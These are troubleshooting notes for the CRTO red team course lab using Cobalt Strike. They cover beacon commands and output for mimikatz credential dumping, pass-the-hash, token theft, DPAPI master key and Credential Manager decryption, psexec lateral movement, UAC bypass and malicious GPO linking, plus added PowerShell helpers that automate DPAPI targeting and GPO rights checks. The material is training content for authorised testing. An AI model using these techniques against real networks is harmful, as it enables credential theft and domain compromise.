Troubleshooting and debugging notes for CRTO – Certified Red Team Operator by Zero-Point Security, using Cobalt Strike. If you encounter other issues/bugs that should be included, message me on Twitter @msd0s7 and I'll add them.
Windows VirtualBox networking
If you have trouble configuring the Windows VM within VirtualBox, the following is my configuration that works as intended in the course. You may need to play with route add and route delete to adjust the routing table, and make sure the VirtualBox network adapter settings match the Windows network cards as shown in the image:





Can’t access mail server
Try HTTPS: there is no redirect from port 80 to 443, so make sure you access the web interface over the secure channel.
Bloodhound can’t find AD
System.DirectoryServices.ActiveDirectory.ActiveDirectoryOperationException: Current security context is not associated with an Active Directory domain or forest.
After I ran elevate uac-token-duplication and got a new shell with administrative privileges (user*; the * after the username marks a high-integrity beacon), I could not run BloodHound: the collector complains that the current security context is not associated with an Active Directory domain or forest. To fix this, either run the collector (SharpHound) from the initial shell where we have regular user permissions, or bypass UAC and get a beacon running as SYSTEM. To do the latter, use the svc-exe elevate module together with an SMB beacon listener (see "Can't run mimikatz" below).
Can’t run mimikatz
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 750674 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
After I bypassed UAC using the uac-token-duplication elevate module, I got a new shell with administrative privileges (user *), however it was still not possible to run mimikatz (ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)). 0x00000005 is access denied on the LSASS handle: the token this bypass hands out is a copy of an elevated token with several rights removed (Cobalt Strike's documentation states this explicitly), so the beacon is high integrity but still cannot open LSASS. Solution (https://youtu.be/5gwEMocFkc0?t=5450):
- Create a new SMB beacon listener (Cobalt Strike -> Listeners -> Add, payload Beacon SMB), named smb-beacon in the command below

- From the elevated shell, run:
beacon> elevate svc-exe smb-beacon
This installs and starts a service binary through the Service Control Manager, which is why it must be run from a shell with local admin rights; the new beacon runs as SYSTEM and links back over the SMB named pipe.

This new shell will have enough privileges to run mimikatz.
The NetworkCredentials provided were unable to create a Kerberos credential
I encountered this error when requesting the SPN ticket for Kerberoasting, but it should apply to accessing any resource on the network that requires authentication.
To fix the problem, we need the NTLM hash of a domain user and use it for pass-the-hash (pth). From the GUI, select Access -> Make Token and select the user to impersonate; if we previously ran mimikatz on the current machine, the NTLM hash for that user should already be listed, so select that one. Or from the command line:
beacon> pth DOMAIN\user <NTLM_HASH>
This runs mimikatz's pass-the-hash in the background: sekurlsa::pth starts a process whose network credentials are the supplied hash, and Beacon steals that process's token, so the beacon now authenticates to the network as that user:
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"%COMSPEC% /c echo 1bc24ed59d8 > \\.\pipe\e63761" command
After this, we should be able to access resources on the network that require authentication, such as requesting SPN tickets for Kerberoasting. Use rev2self to drop the impersonated token when done.
No credentials in the vault
While trying to dump the Windows Credential Manager entries using vaultcmd /listcreds:"Windows Credentials" /all,
nothing was returned.
The reason for this was that I was running as SYSTEM, while the creds were saved under another user (s.bowers). Credential Manager data is stored per user and protected with that user's DPAPI keys, so it is only visible from that user's security context. To fix this, impersonate the target user: list the processes (ps) and steal the token of one of the processes owned by that user.
beacon> steal_token 2724
[*] Tasked beacon to steal token from PID 2724
[+] host called home, sent: 12 bytes
[+] Impersonated CYBER\s.bowers
Can’t retrieve the actual MasterKey from the Domain Controller
If you run the mimikatz command from the beacon similar to:
beacon> mimikatz dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc
[*] Tasked beacon to run mimikatz's dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc command
[+] host called home, sent: 1006154 bytes
You may get an error like the following instead of the key/sha1:
[domainkey] with RPC
[DC] 'cyberbotic.io' will be the domain
[DC] 'dc-1.cyberbotic.io' will be the DC server
ERROR kull_m_rpc_bkrp_generic ; BackuprKey: 0x0000000c (12)
To fix it, prefix the mimikatz command with @. In Beacon, mimikatz @command runs the command under Beacon's current (impersonated) access token, so the /rpc backup-key request to the DC is authenticated with the stolen s.bowers token rather than the beacon's original identity. (The other prefix, !, runs mimikatz as SYSTEM, which is not what we want here.) For example:
beacon> mimikatz @dpapi::masterkey /in:C:\Users\s.bowers\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1132\fcf4f725-0947-4180-a924-bc9da9ed8910 /rpc
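The master key file name and SID above are specific to one profile. As an added example (not code from these notes or from mimikatz), the function below enumerates every DPAPI master key and Credential Manager blob under a user's profile and prints the matching beacon commands with the @ prefix. The profile layout is the standard Windows one; the function name, output format and the choice to pair each blob with dpapi::cred are my own. Run it from a beacon that can read the profile (SYSTEM, or the user's own token).

```powershell
# Added example: enumerate DPAPI master keys and credential blobs for one user
# and emit the mimikatz commands to run from Beacon. Not part of the original
# notes or of mimikatz; function name is a hypothetical choice.
#   beacon> powershell-import .\Get-DpapiTargets.ps1
#   beacon> powershell Get-DpapiTargets -User s.bowers
function Get-DpapiTargets {
    param([Parameter(Mandatory)][string]$User)

    $profileDir = Join-Path $env:SystemDrive "Users\$User"
    if (-not (Test-Path $profileDir)) { throw "no profile directory at $profileDir" }

    $guidRe = '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'

    # Master keys live under Protect\<user SID>\<GUID>; the files are
    # hidden+system, hence -Force. "Preferred" and "BK-*" are filtered out.
    $protect = Join-Path $profileDir 'AppData\Roaming\Microsoft\Protect'
    $masterKeys = Get-ChildItem -Path $protect -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like 'S-1-5-21-*' } |
        Get-ChildItem -File -Force |
        Where-Object { $_.Name -match $guidRe }

    # Credential Manager blobs (roaming and local) that those master keys protect.
    $blobDirs = @(
        (Join-Path $profileDir 'AppData\Roaming\Microsoft\Credentials'),
        (Join-Path $profileDir 'AppData\Local\Microsoft\Credentials')
    )
    $blobs = $blobDirs | Where-Object { Test-Path $_ } |
        ForEach-Object { Get-ChildItem -Path $_ -File -Force }

    foreach ($mk in $masterKeys) {
        [pscustomobject]@{
            Kind    = 'masterkey'
            Sid     = $mk.Directory.Name
            Path    = $mk.FullName
            # "@" makes mimikatz run under the beacon's impersonated token, which
            # the /rpc backup-key call to the DC needs (see the error above).
            Command = "mimikatz @dpapi::masterkey /in:$($mk.FullName) /rpc"
        }
    }
    foreach ($b in $blobs) {
        [pscustomobject]@{
            Kind    = 'credential'
            Sid     = $null
            Path    = $b.FullName
            # dpapi::cred without /masterkey only parses the blob and reports the
            # guidMasterKey it needs; add /masterkey:<hex> once dpapi::masterkey
            # has returned that key.
            Command = "mimikatz @dpapi::cred /in:$($b.FullName)"
        }
    }
}
```

Match the guidMasterKey printed by dpapi::cred against the Path column of the masterkey rows to know which master key file to retrieve from the DC.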
Could not connect to target
Upon trying to jump to another host using psexec, the beacon would fail to connect with the error "Could not connect to target", even though I could list the directory in \\target\c$. The issue was that I was using the localhost-tcp listener: a bind TCP payload that listens only on 127.0.0.1 of the remote host, so nothing outside that host can connect to it.
beacon> jump psexec64 WKSTN-2429 localhost-tcp
[*] Tasked beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) on WKSTN-2429 via Service Control Manager (\\WKSTN-2429\ADMIN$\07a0157.exe)
[+] host called home, sent: 1040164 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
Started service 07a0157 on WKSTN-2429
[-] Could not connect to target
Make sure the bind beacon listens on 0.0.0.0 and not only on localhost (and that the target's host firewall allows the port; an SMB listener uses port 445, which is already open if you could reach c$):
beacon> jump psexec64 WKSTN-2429 tcp
[*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:5555) on WKSTN-2429 via Service Control Manager (\\WKSTN-2429\ADMIN$\733ceea.exe)
[+] host called home, sent: 289462 bytes
[+] received output:
Started service 733ceea on WKSTN-2429
[+] established link to child beacon: 10.10.121.110
elevate uac-token-duplication – Failed. Tried 1 process tokens and taskmgr.exe
As my user was part of the Administrators group, I tried to elevate my privileges and bypass UAC using the token duplication module, however it would fail:
beacon> elevate uac-token-duplication
[*] Tasked beacon to spawn windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity process (token duplication)
[+] host called home, sent: 215464 bytes
[+] received output:
[-] Failed. Tried 1 process tokens and taskmgr.exe
[-] Could not connect to target
[+] host called home, sent: 12 bytes
Reason for the error was that I was running from an x86 process. Solution was to inject into an x64 process (pick the PID of an x64 process running as the same user from ps), then I was able to use the token-duplication module:
x86 beacon> inject 4544 x64 localhost-tcp
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4544 (x64)
[+] host called home, sent: 255024 bytes
[+] established link to child beacon: 10.10.121.106
x64 beacon> elevate uac-token-duplication
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\\.\pipe\msagent_94fb) in a high integrity process (token duplication)
[+] host called home, sent: 274762 bytes
[+] received output:
[+] Success! Used token from PID 3108
[+] established link to child beacon: 10.10.121.106
Can’t create new gpo link
The error below occurs when the beacon's current security context (here, one with no domain identity that may create and link GPOs) is used for New-GPO. To fix it, make a token for a user that has those rights. make_token creates a new logon session whose credentials are used for network authentication only; the password is not checked locally, so a typo only shows up as another access-denied later.
beacon> make_token cyberbotic.io\n.lamb <password>
beacon> powershell New-GPO -Name 'Totally Legit GPO' | New-GPLink -Target 'OU=3268,OU=Workstations,DC=cyberbotic,DC=io'
[*] Tasked beacon to run: New-GPO -Name 'Totally Legit GPO' | New-GPLink -Target 'OU=3268,OU=Workstations,DC=cyberbotic,DC=io'
[+] host called home, sent: 537 bytes
[+] received output:
(The output is CLIXML-serialised; decoded, the error reads:)
New-GPO : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:75
+ ... 'http://127.0.0.1:14649/'); New-GPO -Name 'Totally Legit GPO' | New-G ...
+                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [New-GPO], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.GroupPolicy.Commands.NewGpoCommand
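Two checks are worth running before the New-GPO | New-GPLink one-liner: who actually holds the rights it needs, and whether the credentials you are about to pass to make_token are valid (make_token will happily accept a wrong password). The following is an added example, not code from these notes or from the GroupPolicy module. The DC name, domain, user and target OU are taken from the notes; the function names, the ADSI-based permission walk and the output layout are my own choices.

```powershell
# Added example: prerequisites for creating and linking a GPO from a beacon.
# Not part of the original notes or of the GroupPolicy module; function names
# are hypothetical. Usage from a beacon:
#   beacon> powershell-import .\Test-GpoPrereqs.ps1
#   beacon> powershell Test-DomainCredential -UserName 'cyberbotic\n.lamb' -Password '<password>'
#   beacon> powershell Get-GpoRights

# (1) Bind to the DC with explicit credentials; a wrong password throws here
#     instead of surfacing later as an unexplained "Access is denied".
function Test-DomainCredential {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Password,
        [string]$Server = 'dc-1.cyberbotic.io'
    )
    try {
        $de = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server", $UserName, $Password)
        [void]$de.NativeObject   # forces the bind; throws on bad credentials
        return $true
    } catch {
        Write-Warning "bind as $UserName failed: $($_.Exception.Message)"
        return $false
    }
}

# (2) Who may create GPOs (CreateChild of groupPolicyContainer under
#     CN=Policies,CN=System) and who may link them (WriteProperty on gPLink of
#     the target OU). Schema GUIDs are resolved at run time, not hard-coded.
function Get-GpoRights {
    param([string]$TargetOU = 'OU=3268,OU=Workstations,DC=cyberbotic,DC=io')

    $rootDse  = [ADSI]'LDAP://RootDSE'
    $domainNc = $rootDse.defaultNamingContext.Value
    $schemaNc = $rootDse.schemaNamingContext.Value

    function Get-SchemaGuid([string]$LdapDisplayName) {
        $searcher = New-Object System.DirectoryServices.DirectorySearcher
        $searcher.SearchRoot = [ADSI]"LDAP://$schemaNc"
        $searcher.Filter     = "(lDAPDisplayName=$LdapDisplayName)"
        [void]$searcher.PropertiesToLoad.Add('schemaIDGUID')
        [guid]::new([byte[]]$searcher.FindOne().Properties['schemaidguid'][0])
    }
    $gpcGuid    = Get-SchemaGuid 'groupPolicyContainer'
    $gpLinkGuid = Get-SchemaGuid 'gPLink'

    function Get-Allowed($entry, $wanted, [guid]$objectType) {
        # Matching ACEs: Allow, the wanted bit set (GenericAll covers it), and
        # either unscoped (ObjectType empty) or scoped to our class/attribute.
        $entry.psbase.ObjectSecurity.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (($_.ActiveDirectoryRights -band $wanted) -ne 0) -and
            ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType -eq $objectType)
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
    }

    $policies = [ADSI]"LDAP://CN=Policies,CN=System,$domainNc"
    $ou       = [ADSI]"LDAP://$TargetOU"

    [pscustomobject]@{
        RunningAs = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        CanCreate = @(Get-Allowed $policies [System.DirectoryServices.ActiveDirectoryRights]::CreateChild   $gpcGuid)
        CanLink   = @(Get-Allowed $ou       [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty $gpLinkGuid)
    }
}
```

If RunningAs is not in (or a member of a group in) both CanCreate and CanLink, the one-liner will fail with the E_ACCESSDENIED above; make_token as one of the listed principals (typically Group Policy Creator Owners or Domain Admins for creation, plus whoever was delegated gPLink on the OU) and run it again.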